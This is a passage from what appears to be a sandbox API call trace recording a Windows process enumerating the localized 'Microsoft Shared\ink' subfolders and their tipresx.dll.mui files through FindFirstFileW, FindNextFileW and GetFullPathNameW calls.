ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.383] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0046.383] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", lpFilePart=0x0) returned 0x43 [0046.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\", lpFilePart=0x0) returned 0x44 [0046.383] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.383] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.383] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0046.384] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", lpFilePart=0x0) returned 0x38 [0046.384] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.384] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.384] CoTaskMemFree (pv=0x4fe370) [0046.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", lpFilePart=0x0) returned 0x38 [0046.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", lpFilePart=0x0) returned 0x38 [0046.384] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\", lpFilePart=0x0) returned 0x39 [0046.384] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.385] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.385] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.385] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.385] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", lpFilePart=0x0) returned 0x38 [0046.385] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\", lpFilePart=0x0) returned 0x39 [0046.386] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.386] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.386] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.386] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.386] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.386] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", lpFilePart=0x0) returned 0x38 [0046.386] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.386] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.386] CoTaskMemFree (pv=0x4fe370) [0046.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.387] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", lpFilePart=0x0) returned 0x38 [0046.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.387] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", lpFilePart=0x0) returned 0x38 [0046.387] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\", lpFilePart=0x0) returned 0x39 [0046.387] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.387] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.387] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.388] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.388] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", lpFilePart=0x0) returned 0x38 [0046.388] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\", lpFilePart=0x0) returned 0x39 [0046.388] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.388] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.388] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.389] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.389] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.389] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", lpFilePart=0x0) returned 0x38 [0046.389] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.389] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.389] CoTaskMemFree (pv=0x4fe370) [0046.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.390] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", lpFilePart=0x0) returned 0x38 [0046.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.390] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", lpFilePart=0x0) returned 0x38 [0046.390] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\", lpFilePart=0x0) returned 0x39 [0046.390] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.391] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.391] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.391] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.391] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", lpFilePart=0x0) returned 0x38 [0046.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\", lpFilePart=0x0) returned 0x39 [0046.392] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.392] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.392] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.392] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", 